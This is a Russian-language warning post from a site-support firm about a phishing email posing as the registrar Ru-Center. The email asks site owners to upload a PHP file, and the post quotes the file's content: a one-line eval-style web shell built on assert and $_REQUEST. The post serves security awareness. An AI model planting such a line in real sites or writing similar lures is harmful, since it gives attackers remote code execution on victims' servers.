Не теряем бдительность при поддержке сайта
Иногда нашу техническую поддержку поддержку просят разместить на сайте различные скрипты или файлы, подтверждающие принадлежность к той или иной системе. В этом случае важно не допустить размещение вредоносного кода на сайте. Наша поддержка всегда внимательно анализирует и проверяет файлы перед размещением.
26 апреля к нам обратился Клиент с просьбой разместить код в корневом каталоге. Он получил письмо от имени Ru-Center - известного в России регистратора доменов.
Письмо выглядело очень убедительно и в качестве отправителя был указан адрес электронной почты, прикрепленный к домену Ру-Центра.
Содержание письма:
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ХХХХХХ.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a18a90ycf1xucr6a.php со следующим содержимым:
assert(stripslashes($_REQUEST RUCENTER]))
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 12 мая 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
В целях предотвращения вероятности заражения сайта вредоносным кодом нами направлен запрос в Ру-Центр. Ответ от поддержки Ру-Центр:
Вы получили мошенническое письмо. Ни в коем случае не следует выполнять описанные в нём действия. RU-CENTER, равно как и любой другой Регистратор, не требует размещения на сайте выполнимых файлов.
--
С уважением,
Департамент по работе с клиентами
RU-CENTER Group
Резюме: проверяйте всё, что Вы размещаете на сайте, не доверяйте письмам, пришедшим на электронную почту и тщательно выбирайте компанию, которая будет осуществлять поддержку Вашего сайта.